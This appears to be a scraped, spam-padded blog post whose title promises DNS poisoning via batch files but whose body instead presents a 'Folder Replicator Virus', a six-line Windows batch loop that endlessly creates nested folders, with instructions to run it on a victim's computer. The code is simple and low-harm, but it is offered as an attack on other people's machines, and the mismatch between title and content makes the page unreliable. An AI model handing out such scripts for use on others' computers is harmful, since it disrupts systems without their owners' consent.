Info DNS POISONING USING BATCH FILE PART-2 - this blog we have built from a few years ago and already very much information about gadgets that we convey and a lot of blog visitors
New Blog Techno News who are satisfied with the information, we will always try to update the latest information for you, first about Info DNS POISONING USING BATCH FILE PART-2 many already we collect data to make this article so you do not miss the news, please see:
Articles :
Info DNS POISONING USING BATCH FILE PART-2
full Link :
Info DNS POISONING USING BATCH FILE PART-2
Article Batch File Viruses,
You can also see our article on:
Info DNS POISONING USING BATCH FILE PART-2
 |
DNS POISONING USING BATCH FILE PART-2 |
Batch program offers its programmers to create their custom viruses just by misusing the way the command works, which leads to the creation of batch viruses. In this chapter we are going to learn about the dark-side of the batch by learning how to misuse commands to create batch viruses.
Folder Replicator Virus:
Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating a folder with same name, until a user stops it.
1. Just open up a notepad, copy and paste the below code
cd\
cd C:\Documents and Settings\username\Desktop
:loop
md Virus
cd Virus
goto loop
2. Save it as a batch file with the extension .bat, before doing that you have to modify the code by changing the place where it says ‘username’ and instead of that replace it by the currently logged in username.
3. Then run it on the Victims computer to infect it.
4. Any how it doesn’t cause much harm, but replicates folder inside a folder and goes on.
Once more thing that you have to notice is that, this will create directory inside another directory with the same name, so it doesn’t looks like crap, since everything reside inside one main directory, more over deleting the root directory will purge all the clumsy thing done by this piece of code.
articles Info DNS POISONING USING BATCH FILE PART-2 finished in discussion
hopefully the information we convey about Info DNS POISONING USING BATCH FILE PART-2 can benefit you in getting new knowledge about technology,
you just finished reading the information Info DNS POISONING USING BATCH FILE PART-2 we hope this informmation can answer the question you submit to googlle, if you want to bookmark or share please use link https://moymoycikukecik.blogspot.com/2016/06/info-dns-poisoning-using-batch-file_18.html and do not forget to always visit this blog to get the latest information every day.
Tag :
Batch File Viruses,
0 komentar:
Posting Komentar